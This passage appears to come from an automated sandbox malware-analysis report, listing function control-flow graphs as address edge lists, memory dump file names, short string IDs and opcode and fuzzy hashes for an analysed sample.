                                                  control_flow_graph 1489 7ffaaca8bae0-7ffaaca8baee 1490 7ffaaca8baf0 1489->1490 1491 7ffaaca8bafb-7ffaaca8bb91 1490->1491 1494 7ffaaca8bb16-7ffaaca8bb96 1491->1494 1495 7ffaaca8bb9c-7ffaaca8bbdf 1491->1495 1494->1495 1499 7ffaaca8bb38-7ffaaca8bb98 1494->1499 1504 7ffaaca8bbe1-7ffaaca8bc36 1495->1504 1499->1495 1506 7ffaaca8bb5c-7ffaaca8bb9a 1499->1506 1513 7ffaaca8bc41-7ffaaca8bce7 1504->1513 1506->1495 1511 7ffaaca8bb7d-7ffaaca8bb90 1506->1511 1525 7ffaaca8be17-7ffaaca8be34 1513->1525 1526 7ffaaca8bced-7ffaaca8c090 1513->1526 1527 7ffaaca8be3a-7ffaaca8be3f 1525->1527 1528 7ffaaca8c141-7ffaaca8c159 1525->1528 1530 7ffaaca8be42-7ffaaca8be49 1527->1530 1534 7ffaaca8c15b-7ffaaca8c318 1528->1534 1535 7ffaaca8c10d-7ffaaca8c118 1528->1535 1532 7ffaaca8be4b-7ffaaca8be4f 1530->1532 1533 7ffaaca8bdcc-7ffaaca8c139 1530->1533 1532->1504 1537 7ffaaca8be55 1532->1537 1533->1528 1539 7ffaaca8bed3-7ffaaca8bed6 1537->1539 1541 7ffaaca8bed9-7ffaaca8bee0 1539->1541 1543 7ffaaca8bee6 1541->1543 1544 7ffaaca8be57-7ffaaca8be8c call 7ffaaca8bae0 1541->1544 1546 7ffaaca8bf56-7ffaaca8bf5d 1543->1546 1544->1528 1551 7ffaaca8be92-7ffaaca8bea2 1544->1551 1548 7ffaaca8bee8-7ffaaca8bf1a call 7ffaaca8bae0 1546->1548 1549 7ffaaca8bf5f-7ffaaca8bfa5 1546->1549 1548->1528 1556 7ffaaca8bf20-7ffaaca8bf48 1548->1556 1563 7ffaaca8bd74-7ffaaca8bd78 1549->1563 1564 7ffaaca8bfab-7ffaaca8bfb0 1549->1564 1551->1504 1554 7ffaaca8bea8-7ffaaca8bec5 1551->1554 1554->1528 1557 7ffaaca8becb-7ffaaca8bed0 1554->1557 1556->1528 1558 7ffaaca8bf4e-7ffaaca8bf53 1556->1558 1557->1539 1558->1546 1565 7ffaaca8bdca 1563->1565 1566 7ffaaca8bd7a-7ffaaca8c10c 1563->1566 1567 7ffaaca8c036-7ffaaca8c03a 1564->1567 1565->1530 1566->1535 1569 7ffaaca8bfb5-7ffaaca8bfe4 call 7ffaaca8bae0 1567->1569 1570 7ffaaca8c040-7ffaaca8c046 1567->1570 1569->1528 1573 7ffaaca8bfea-7ffaaca8bffa 1569->1573 1573->1513 1574 7ffaaca8c000-7ffaaca8c00f 1573->1574 1574->1528 1575 7ffaaca8c015-7ffaaca8c028 1574->1575 1575->1541 1576 7ffaaca8c02e-7ffaaca8c033 1575->1576 1576->1567
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6
                                                  • API String ID: 0-3183416175
                                                  • Opcode ID: fc37167a43e3ac630d1124180afe4eb53a8943d01c31dc2ece3e43a9b78d972c
                                                  • Instruction ID: 9fb97efd18279e5e1e36462437a8082ca2ddd9f5f9d8cb26b9803b2788dfadf4
                                                  • Opcode Fuzzy Hash: fc37167a43e3ac630d1124180afe4eb53a8943d01c31dc2ece3e43a9b78d972c
                                                  • Instruction Fuzzy Hash: 78510771D2C55ACFF7A89718A865AF877A2FF56300F50C1B9D04FC7186ED28AE488781
                                                  Function 00007FFAACA81980 Relevance: 3.2, Strings: 2, Instructions: 690COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1708 7ffaaca81980-7ffaaca8199a 1709 7ffaaca819a0-7ffaaca819b0 1708->1709 1710 7ffaaca81f9c-7ffaaca81fc0 1708->1710 1712 7ffaaca81ffa-7ffaaca82010 1709->1712 1713 7ffaaca819b6-7ffaaca819f1 1709->1713 1716 7ffaaca8205a-7ffaaca8206d 1712->1716 1717 7ffaaca82012-7ffaaca82036 1712->1717 1718 7ffaaca81a8a-7ffaaca81a92 1713->1718 1719 7ffaaca81a98 1718->1719 1720 7ffaaca819f6-7ffaaca819ff 1718->1720 1721 7ffaaca81aa2-7ffaaca81ad7 1719->1721 1720->1712 1722 7ffaaca81a05-7ffaaca81a10 1720->1722 1733 7ffaaca81af0-7ffaaca81aff 1721->1733 1734 7ffaaca81ad9-7ffaaca81aee 1721->1734 1723 7ffaaca81a9a-7ffaaca81a9e 1722->1723 1724 7ffaaca81a16-7ffaaca81a2a 1722->1724 1723->1721 1726 7ffaaca81a2c-7ffaaca81a43 1724->1726 1727 7ffaaca81a83-7ffaaca81a87 1724->1727 1726->1712 1728 7ffaaca81a49-7ffaaca81a55 1726->1728 1727->1718 1729 7ffaaca81a6f-7ffaaca81a80 1728->1729 1730 7ffaaca81a57-7ffaaca81a6b 1728->1730 1729->1727 1730->1726 1732 7ffaaca81a6d 1730->1732 1732->1727 1737 7ffaaca81b21-7ffaaca81b8e 1733->1737 1738 7ffaaca81b01-7ffaaca81b1c 1733->1738 1734->1733 1748 7ffaaca81b90-7ffaaca81ba3 1737->1748 1749 7ffaaca81bdf-7ffaaca81c26 1737->1749 1745 7ffaaca81f59-7ffaaca81f8a 1738->1745 1754 7ffaaca81f8c-7ffaaca81f96 1745->1754 1748->1712 1750 7ffaaca81ba9-7ffaaca81bd7 1748->1750 1757 7ffaaca81c2a-7ffaaca81c4b 1749->1757 1758 7ffaaca81bd8-7ffaaca81bdd 1750->1758 1754->1709 1754->1710 1761 7ffaaca81c4d-7ffaaca81c51 1757->1761 1762 7ffaaca81cbc-7ffaaca81ccd 1757->1762 1758->1748 1759 7ffaaca81bde 1758->1759 1759->1749 1761->1758 1765 7ffaaca81c53 1761->1765 1764 7ffaaca81cce-7ffaaca81cd1 1762->1764 1767 7ffaaca81cd7-7ffaaca81cdb 1764->1767 1766 7ffaaca81c7c-7ffaaca81c8d 1765->1766 1766->1767 1772 7ffaaca81c8f-7ffaaca81c9d 1766->1772 1768 7ffaaca81cdd-7ffaaca81cdf 1767->1768 1770 7ffaaca81ce1-7ffaaca81cef 1768->1770 1771 7ffaaca81d29-7ffaaca81d31 1768->1771 1775 7ffaaca81cf1-7ffaaca81cf5 1770->1775 1776 7ffaaca81d60-7ffaaca81d75 1770->1776 1773 7ffaaca81d7b-7ffaaca81d83 1771->1773 1774 7ffaaca81d33-7ffaaca81d3c 1771->1774 1780 7ffaaca81c9f-7ffaaca81ca3 1772->1780 1781 7ffaaca81d0e-7ffaaca81d23 1772->1781 1778 7ffaaca81e0b-7ffaaca81e19 1773->1778 1779 7ffaaca81d89-7ffaaca81da2 1773->1779 1782 7ffaaca81d3f-7ffaaca81d41 1774->1782 1775->1766 1783 7ffaaca81cf7 1775->1783 1776->1773 1785 7ffaaca81e1b-7ffaaca81e1d 1778->1785 1786 7ffaaca81e8a-7ffaaca81e8b 1778->1786 1779->1778 1784 7ffaaca81da4-7ffaaca81da5 1779->1784 1780->1757 1795 7ffaaca81ca5 1780->1795 1781->1771 1788 7ffaaca81d43-7ffaaca81d45 1782->1788 1789 7ffaaca81db2-7ffaaca81db4 1782->1789 1783->1781 1791 7ffaaca81da6-7ffaaca81db1 1784->1791 1792 7ffaaca81e1f 1785->1792 1793 7ffaaca81e99-7ffaaca81e9b 1785->1793 1790 7ffaaca81ebb-7ffaaca81ebd 1786->1790 1796 7ffaaca81dc1-7ffaaca81dc5 1788->1796 1797 7ffaaca81d47 1788->1797 1801 7ffaaca81db5-7ffaaca81db7 1789->1801 1803 7ffaaca81ebf 1790->1803 1804 7ffaaca81f2e-7ffaaca81f40 1790->1804 1791->1789 1823 7ffaaca81e2d 1791->1823 1792->1791 1800 7ffaaca81e21 1792->1800 1798 7ffaaca81e9d-7ffaaca81e9f 1793->1798 1799 7ffaaca81f0c 1793->1799 1795->1762 1805 7ffaaca81e41-7ffaaca81e4d 1796->1805 1806 7ffaaca81dc7 1796->1806 1797->1764 1802 7ffaaca81d49 1797->1802 1810 7ffaaca81ea1 1798->1810 1811 7ffaaca81f1b-7ffaaca81f1f 1798->1811 1807 7ffaaca81f0e-7ffaaca81f10 1799->1807 1808 7ffaaca81f7d-7ffaaca81f8a 1799->1808 1812 7ffaaca81e28-7ffaaca81e2c 1800->1812 1827 7ffaaca81e38-7ffaaca81e40 1801->1827 1828 7ffaaca81db8 1801->1828 1814 7ffaaca81d4e-7ffaaca81d54 1802->1814 1817 7ffaaca81edc-7ffaaca81eea 1803->1817 1815 7ffaaca81f46-7ffaaca81f48 1804->1815 1816 7ffaaca81e53-7ffaaca81e5b 1805->1816 1806->1814 1818 7ffaaca81dc9 1806->1818 1807->1754 1820 7ffaaca81f12 1807->1820 1808->1754 1810->1812 1826 7ffaaca81ea3 1810->1826 1821 7ffaaca81f21 1811->1821 1822 7ffaaca81f9b 1811->1822 1812->1823 1824 7ffaaca81ea8-7ffaaca81eac 1812->1824 1832 7ffaaca81dd0-7ffaaca81df5 1814->1832 1838 7ffaaca81d56 1814->1838 1819 7ffaaca81f4a-7ffaaca81f4b 1815->1819 1829 7ffaaca81e8d-7ffaaca81e96 1816->1829 1830 7ffaaca81e5d-7ffaaca81e6b 1816->1830 1831 7ffaaca81eeb-7ffaaca81ef5 1817->1831 1818->1832 1846 7ffaaca81f56-7ffaaca81f57 1819->1846 1820->1793 1834 7ffaaca81f14 1820->1834 1821->1824 1835 7ffaaca81f23 1821->1835 1822->1710 1836 7ffaaca81eae 1823->1836 1837 7ffaaca81e2e 1823->1837 1824->1836 1826->1824 1827->1805 1828->1782 1840 7ffaaca81db9-7ffaaca81dba 1828->1840 1829->1793 1830->1817 1841 7ffaaca81e6d-7ffaaca81e6f 1830->1841 1833 7ffaaca81ef7-7ffaaca81f0a 1831->1833 1850 7ffaaca81df8-7ffaaca81e09 1832->1850 1833->1799 1834->1811 1843 7ffaaca81f2a-7ffaaca81f2d 1835->1843 1836->1843 1847 7ffaaca81eb0 1836->1847 1837->1801 1844 7ffaaca81e2f-7ffaaca81e30 1837->1844 1838->1768 1845 7ffaaca81d58 1838->1845 1840->1796 1841->1831 1848 7ffaaca81e71 1841->1848 1843->1804 1844->1827 1845->1776 1846->1745 1847->1833 1851 7ffaaca81eb2-7ffaaca81eba 1847->1851 1848->1850 1852 7ffaaca81e73-7ffaaca81ec5 1848->1852 1850->1778 1850->1784 1851->1790 1854 7ffaaca81f41-7ffaaca81f42 1852->1854 1855 7ffaaca81ec7 1852->1855 1854->1815 1856 7ffaaca81e4e-7ffaaca81e4f 1855->1856 1857 7ffaaca81ec9 1855->1857 1856->1816 1857->1854
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: e6955d0bbf159bdebfc4d2f49ececf6e93079707332cd4f4929a1eaa591ec6da
                                                  • Instruction ID: a0163c83d646ae48d54ac3976332b0f938ace0c9eadcbad10ce51dbf33c3a163
                                                  • Opcode Fuzzy Hash: e6955d0bbf159bdebfc4d2f49ececf6e93079707332cd4f4929a1eaa591ec6da
                                                  • Instruction Fuzzy Hash: DC329430A19A1DCFEB98DB18D895A7877E2FF55310B5481B9D10EC7292EE24ED45CBC0
                                                  Function 00007FFAAC6C2820 Relevance: 3.2, Strings: 2, Instructions: 687COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1858 7ffaac6c2820-7ffaac6c283a 1859 7ffaac6c2e3c-7ffaac6c2e4d 1858->1859 1860 7ffaac6c2840-7ffaac6c2850 1858->1860 1861 7ffaac6c2856-7ffaac6c2891 1860->1861 1862 7ffaac6c2e9a-7ffaac6c2eb0 1860->1862 1866 7ffaac6c292a-7ffaac6c2932 1861->1866 1867 7ffaac6c2eb2-7ffaac6c2ed6 1862->1867 1868 7ffaac6c2efa-7ffaac6c2f0d 1862->1868 1869 7ffaac6c2938 1866->1869 1870 7ffaac6c2896-7ffaac6c289f 1866->1870 1872 7ffaac6c2942-7ffaac6c2977 1869->1872 1870->1862 1871 7ffaac6c28a5-7ffaac6c28b0 1870->1871 1873 7ffaac6c28b6-7ffaac6c28ca 1871->1873 1874 7ffaac6c293a-7ffaac6c293e 1871->1874 1882 7ffaac6c2979-7ffaac6c298e 1872->1882 1883 7ffaac6c2990-7ffaac6c299f 1872->1883 1876 7ffaac6c2923-7ffaac6c2927 1873->1876 1877 7ffaac6c28cc-7ffaac6c28e3 1873->1877 1874->1872 1876->1866 1877->1862 1878 7ffaac6c28e9-7ffaac6c28f5 1877->1878 1880 7ffaac6c28f7-7ffaac6c290b 1878->1880 1881 7ffaac6c290f-7ffaac6c2920 1878->1881 1880->1877 1884 7ffaac6c290d 1880->1884 1881->1876 1882->1883 1888 7ffaac6c29c1-7ffaac6c2a2e 1883->1888 1889 7ffaac6c29a1-7ffaac6c29bc 1883->1889 1884->1876 1898 7ffaac6c2a30-7ffaac6c2a43 1888->1898 1899 7ffaac6c2a7f-7ffaac6c2ac6 1888->1899 1895 7ffaac6c2df9-7ffaac6c2e2a 1889->1895 1904 7ffaac6c2e2c-7ffaac6c2e36 1895->1904 1898->1862 1901 7ffaac6c2a49-7ffaac6c2a77 1898->1901 1909 7ffaac6c2aca-7ffaac6c2aeb 1899->1909 1908 7ffaac6c2a78-7ffaac6c2a7d 1901->1908 1904->1859 1904->1860 1908->1898 1910 7ffaac6c2a7e 1908->1910 1912 7ffaac6c2aed-7ffaac6c2af1 1909->1912 1913 7ffaac6c2b5c-7ffaac6c2b6d 1909->1913 1910->1899 1912->1908 1916 7ffaac6c2af3 1912->1916 1914 7ffaac6c2b6e-7ffaac6c2b71 1913->1914 1917 7ffaac6c2b77-7ffaac6c2b7b 1914->1917 1918 7ffaac6c2b1c-7ffaac6c2b2d 1916->1918 1919 7ffaac6c2b7d-7ffaac6c2b7f 1917->1919 1918->1917 1925 7ffaac6c2b2f-7ffaac6c2b3d 1918->1925 1920 7ffaac6c2bc9-7ffaac6c2bd1 1919->1920 1921 7ffaac6c2b81-7ffaac6c2b8f 1919->1921 1923 7ffaac6c2bd3-7ffaac6c2bdc 1920->1923 1924 7ffaac6c2c1b-7ffaac6c2c23 1920->1924 1926 7ffaac6c2b91-7ffaac6c2b95 1921->1926 1927 7ffaac6c2c00-7ffaac6c2c15 1921->1927 1928 7ffaac6c2bdf-7ffaac6c2be1 1923->1928 1932 7ffaac6c2c29-7ffaac6c2c42 1924->1932 1933 7ffaac6c2cab-7ffaac6c2cb9 1924->1933 1929 7ffaac6c2b3f-7ffaac6c2b43 1925->1929 1930 7ffaac6c2bae-7ffaac6c2bc3 1925->1930 1926->1918 1937 7ffaac6c2b97 1926->1937 1927->1924 1934 7ffaac6c2be3-7ffaac6c2be5 1928->1934 1935 7ffaac6c2c52-7ffaac6c2c54 1928->1935 1929->1909 1946 7ffaac6c2b45 1929->1946 1930->1920 1932->1933 1938 7ffaac6c2c44-7ffaac6c2c45 1932->1938 1939 7ffaac6c2cbb-7ffaac6c2cbd 1933->1939 1940 7ffaac6c2d2a-7ffaac6c2d2b 1933->1940 1944 7ffaac6c2be7 1934->1944 1945 7ffaac6c2c61-7ffaac6c2c65 1934->1945 1950 7ffaac6c2c55-7ffaac6c2c57 1935->1950 1937->1930 1948 7ffaac6c2c46-7ffaac6c2c51 1938->1948 1941 7ffaac6c2d39-7ffaac6c2d3b 1939->1941 1942 7ffaac6c2cbf 1939->1942 1947 7ffaac6c2d5b-7ffaac6c2d5d 1940->1947 1956 7ffaac6c2d3d-7ffaac6c2d3f 1941->1956 1957 7ffaac6c2dac 1941->1957 1942->1948 1949 7ffaac6c2cc1 1942->1949 1944->1914 1951 7ffaac6c2be9 1944->1951 1952 7ffaac6c2c67 1945->1952 1953 7ffaac6c2ce1-7ffaac6c2ced 1945->1953 1946->1913 1954 7ffaac6c2d5f 1947->1954 1955 7ffaac6c2dce-7ffaac6c2de0 1947->1955 1948->1935 1971 7ffaac6c2ccd 1948->1971 1961 7ffaac6c2cc8-7ffaac6c2ccc 1949->1961 1972 7ffaac6c2cd8-7ffaac6c2ce0 1950->1972 1973 7ffaac6c2c58 1950->1973 1963 7ffaac6c2bee-7ffaac6c2bf4 1951->1963 1952->1963 1966 7ffaac6c2c69 1952->1966 1965 7ffaac6c2cf3-7ffaac6c2cfb 1953->1965 1967 7ffaac6c2d7c-7ffaac6c2d8a 1954->1967 1964 7ffaac6c2de6-7ffaac6c2de8 1955->1964 1958 7ffaac6c2dbb-7ffaac6c2dbf 1956->1958 1959 7ffaac6c2d41 1956->1959 1968 7ffaac6c2e1d-7ffaac6c2e2a 1957->1968 1969 7ffaac6c2dae-7ffaac6c2db0 1957->1969 1979 7ffaac6c2e3b 1958->1979 1980 7ffaac6c2dc1 1958->1980 1959->1961 1970 7ffaac6c2d43 1959->1970 1961->1971 1981 7ffaac6c2d48-7ffaac6c2d4c 1961->1981 1974 7ffaac6c2c70-7ffaac6c2c95 1963->1974 1992 7ffaac6c2bf6 1963->1992 1983 7ffaac6c2dea-7ffaac6c2deb 1964->1983 1976 7ffaac6c2d2d-7ffaac6c2d36 1965->1976 1977 7ffaac6c2cfd-7ffaac6c2d0b 1965->1977 1966->1974 1975 7ffaac6c2d8b-7ffaac6c2d95 1967->1975 1968->1904 1969->1904 1978 7ffaac6c2db2 1969->1978 1970->1981 1989 7ffaac6c2d4e 1971->1989 1990 7ffaac6c2cce 1971->1990 1972->1953 1973->1928 1985 7ffaac6c2c59-7ffaac6c2c5a 1973->1985 2001 7ffaac6c2c98-7ffaac6c2ca9 1974->2001 1986 7ffaac6c2d97-7ffaac6c2daa 1975->1986 1976->1941 1977->1967 1987 7ffaac6c2d0d-7ffaac6c2d0f 1977->1987 1978->1941 1988 7ffaac6c2db4 1978->1988 1979->1859 1980->1981 1991 7ffaac6c2dc3 1980->1991 1981->1989 1997 7ffaac6c2df6-7ffaac6c2df7 1983->1997 1985->1945 1986->1957 1987->1975 1996 7ffaac6c2d11 1987->1996 1988->1958 1993 7ffaac6c2dca-7ffaac6c2dcd 1989->1993 1994 7ffaac6c2d50 1989->1994 1990->1950 1998 7ffaac6c2ccf-7ffaac6c2cd0 1990->1998 1991->1993 1992->1919 1999 7ffaac6c2bf8 1992->1999 1993->1955 1994->1986 2000 7ffaac6c2d52-7ffaac6c2d5a 1994->2000 1996->2001 2003 7ffaac6c2d13-7ffaac6c2d65 1996->2003 1997->1895 1998->1972 1999->1927 2000->1947 2001->1933 2001->1938 2005 7ffaac6c2d67 2003->2005 2006 7ffaac6c2de1-7ffaac6c2de2 2003->2006 2007 7ffaac6c2d69 2005->2007 2008 7ffaac6c2cee-7ffaac6c2cef 2005->2008 2006->1964 2007->2006 2008->1965
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: f1116c3662afc386ae9aca78c2d70b230512976cf88d48b74b20954db83bc7da
                                                  • Instruction ID: 933fbc264203eddde604d8220350c6624f84d598e0dc53cc535fbe72d199c271
                                                  • Opcode Fuzzy Hash: f1116c3662afc386ae9aca78c2d70b230512976cf88d48b74b20954db83bc7da
                                                  • Instruction Fuzzy Hash: 21328330A1DA19CFEB9ADB18C895AB973E1FF59310F5091B9D40EC7292DE24EC45CB80
                                                  Function 00007FFAAC6CB212 Relevance: 3.2, Strings: 2, Instructions: 686COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: d7bee374e545a01f566e657ff8be07fe5f8d56b1b0eb5435af15fe706680fec4
                                                  • Instruction ID: 26101772da253c8b3ad96890fc0fc834a244a5b0f827b5b242e1d55896e5818f
                                                  • Opcode Fuzzy Hash: d7bee374e545a01f566e657ff8be07fe5f8d56b1b0eb5435af15fe706680fec4
                                                  • Instruction Fuzzy Hash: 6232B530A1DA19CFEB9ADB19C895A7873E1FF95311F54A1B9D00EC7292DE24EC45CB80
                                                  Function 00007FFAACA83512 Relevance: 2.8, Strings: 2, Instructions: 311COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 629f7ade9247c5785688e136eb7e519ec8089e2309bfbc22f75362f11f510e54
                                                  • Instruction ID: 7d02ae50cb5272b7dc4edd4fce80d6c3a5f80b6ee2ffe10f27fead68c492b70d
                                                  • Opcode Fuzzy Hash: 629f7ade9247c5785688e136eb7e519ec8089e2309bfbc22f75362f11f510e54
                                                  • Instruction Fuzzy Hash: FBB1F470A2AA46DFE749DB1CD0906B4B7A2FF5A310F548179C04EC7A86EB28F955C7C0
                                                  Function 00007FFAAC6C442A Relevance: 2.8, Strings: 2, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 1587dbf26dc01b5aa170dedf9e95e2a6f49031f79ee248a5a2401076aea4fba9
                                                  • Instruction ID: 4ac33685a077886a2db81963e9df5a65409844a465cfa3d96da1a4bea88bddbd
                                                  • Opcode Fuzzy Hash: 1587dbf26dc01b5aa170dedf9e95e2a6f49031f79ee248a5a2401076aea4fba9
                                                  • Instruction Fuzzy Hash: 1FB1A170A1DA468FE74BDB29C0906B4BBA1FF56300F54A1B9C04EC7A86DF28F85587D1
                                                  Function 00007FFAAC6C48AB Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 2b77f9f848ab7f0d2e3b69c5003c9139497f2a5d587e31fe0dd012aa39b63be3
                                                  • Instruction ID: f76cfc8ea3baea22c87618777d393702dd43ec571e8d0c4dfbc5328283df4377
                                                  • Opcode Fuzzy Hash: 2b77f9f848ab7f0d2e3b69c5003c9139497f2a5d587e31fe0dd012aa39b63be3
                                                  • Instruction Fuzzy Hash: 8A514A70D0D64ACFEB5ACB98C4955BDBBB1EF45300F1091BAD01EA7296CE34A905CB94
                                                  Function 00007FFAACA8B4D8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 6396e7160125f39055aee0297d5835bd783a566b372722c25fb88394c7add0f9
                                                  • Instruction ID: 8a0ee4f0f6e6df8f0d4ec4c1f8b4b0c37a1ac3505111cecfa175da7bd05e8912
                                                  • Opcode Fuzzy Hash: 6396e7160125f39055aee0297d5835bd783a566b372722c25fb88394c7add0f9
                                                  • Instruction Fuzzy Hash: 34517271D1964ACFEB49DB98E8555FDB7B2FF45300F1080BAD01EE7286DA34AA05CB90
                                                  Function 00007FFAAC6CD288 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 001471cce2b188a3e222c587c3da23fa67d4495ed2d29fcdbe082e3081273572
                                                  • Instruction ID: d27cfbea00da8853138acf3efc39ba5a298902b76b9a5c7fac9434a4c9ec6c40
                                                  • Opcode Fuzzy Hash: 001471cce2b188a3e222c587c3da23fa67d4495ed2d29fcdbe082e3081273572
                                                  • Instruction Fuzzy Hash: 7E516171D0D64ADFEB4ACBA8C4555BDBBB1FF45300F10907AC01EEB292CA38A905CB90
                                                  Function 00007FFAACA839E8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 2cebcc1cf3dbde7d047cc32803927d8e8885b628bce9d6ddb00dc7e3ca5eff72
                                                  • Instruction ID: 722727026259b20adf154e3cba10da3cc3062e2327c3c6113abd69c753a354bd
                                                  • Opcode Fuzzy Hash: 2cebcc1cf3dbde7d047cc32803927d8e8885b628bce9d6ddb00dc7e3ca5eff72
                                                  • Instruction Fuzzy Hash: 4A517171D1A64ECFEB59CB9CD4655BDB7B1EF45300F1080BAC01EE7282DA389A05CB91
                                                  Function 00007FFAAC6C32ED Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 7be8d2e5865a86936f6e25021bf463c14f5e7118e768dca21b69d515c8361224
                                                  • Instruction ID: a8d3df81794c4e7734232f1d2ab9fb410d0b494339dd1a72f62cb71476c7c312
                                                  • Opcode Fuzzy Hash: 7be8d2e5865a86936f6e25021bf463c14f5e7118e768dca21b69d515c8361224
                                                  • Instruction Fuzzy Hash: 0E314831E09A4A9FE749DB5C84919B9F7A2FF56350B54913AD01ED3682CF24FC168BC0
                                                  Function 00007FFAACA82505 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: e55114d714575057e408849addae090ffaffc7b06ec11480e6b8755fb340cc23
